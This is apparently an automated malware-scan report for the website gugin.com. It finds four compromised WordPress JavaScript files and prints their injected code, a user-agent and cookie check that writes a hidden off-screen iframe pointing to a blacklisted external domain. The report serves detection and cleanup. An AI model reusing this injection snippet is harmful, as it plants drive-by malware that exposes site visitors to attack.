Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gugin.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gugin.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://gugin.com/ | 200 OK Content-Length: 28386 Content-Type: text/html | clean |
http://platform.twitter.com/widgets.js?ver=4.0 | 200 OK Content-Length: 100803 Content-Type: application/javascript | clean |
http://apis.google.com/js/plusone.js?ver=4.0 | 200 OK Content-Length: 12489 Content-Type: application/javascript | clean |
http://platform.linkedin.com/in.js?ver=4.0 | 200 OK Content-Length: 3690 Content-Type: text/javascript | clean |
http://gugin.com/wp-content/plugins/Archive/jquery.form.js?ver=2.52 | 200 OK Content-Length: 29456 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: mifiliter.ifriqiyah-site.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).get ...[3676 bytes skipped]... Decoded script: <iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://mifiliter.ifriqiyah-site.com/ififagule16.html This URL is marked by Google as suspicious <iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://gugin.com/wp-content/plugins/Archive/scripts.js?ver=3.1 | 200 OK Content-Length: 7268 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: mifiliter.ifriqiyah-site.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).get ...[3534 bytes skipped]... Decoded script: <iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://mifiliter.ifriqiyah-site.com/ififagule16.html This URL is marked by Google as suspicious <iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://gugin.com/wp-content/themes/point/js/customscript.js?ver=null | 200 OK Content-Length: 2387 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: mifiliter.ifriqiyah-site.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).get ...[1098 bytes skipped]... Decoded script: <iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://mifiliter.ifriqiyah-site.com/ififagule16.html This URL is marked by Google as suspicious <iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://gugin.com/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-en.js?ver=2.6.11 | 200 OK Content-Length: 11225 Content-Type: application/javascript | clean |
http://gugin.com/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.6.11 | 200 OK Content-Length: 71745 Content-Type: application/javascript | clean |
http://gugin.com/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.6.11 | 200 OK Content-Length: 3171 Content-Type: application/javascript | clean |
http://gugin.com/about-2/ | 200 OK Content-Length: 25971 Content-Type: text/html | clean |
http://gugin.com/wp-content/plugins/akismet/_inc/form.js?ver=3.0.2 | 200 OK Content-Length: 1760 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: mifiliter.ifriqiyah-site.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date).get ...[890 bytes skipped]... Decoded script: <iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://mifiliter.ifriqiyah-site.com/ififagule16.html This URL is marked by Google as suspicious <iframe src="http://mifiliter.ifriqiyah-site.com/ififagule16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://gugin.com/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://gugin.com/organisational-effectiveness/ | 200 OK Content-Length: 29521 Content-Type: text/html | clean |
http://gugin.com/blog/ | 200 OK Content-Length: 23574 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gugin.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 12:46:25 GMT
Pragma: no-cache
Server: LiteSpeed
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://gugin.com/>; rel=shortlink
Set-Cookie: PHPSESSID=09a2ab46b6b1b8116f0e78c58cdd2ea1; path=/
X-Pingback: http://gugin.com/xmlrpc.php
X-Powered-By: PHP/5.4.31
GET / HTTP/1.1
Host: gugin.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 12:46:25 GMT
Pragma: no-cache
Server: LiteSpeed
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://gugin.com/>; rel=shortlink
Set-Cookie: PHPSESSID=09a2ab46b6b1b8116f0e78c58cdd2ea1; path=/
X-Pingback: http://gugin.com/xmlrpc.php
X-Powered-By: PHP/5.4.31
Second query (visit from search engine):
GET / HTTP/1.1
Host: gugin.com
Referer: http://www.google.com/search?q=gugin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gugin.com
Referer: http://www.google.com/search?q=gugin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.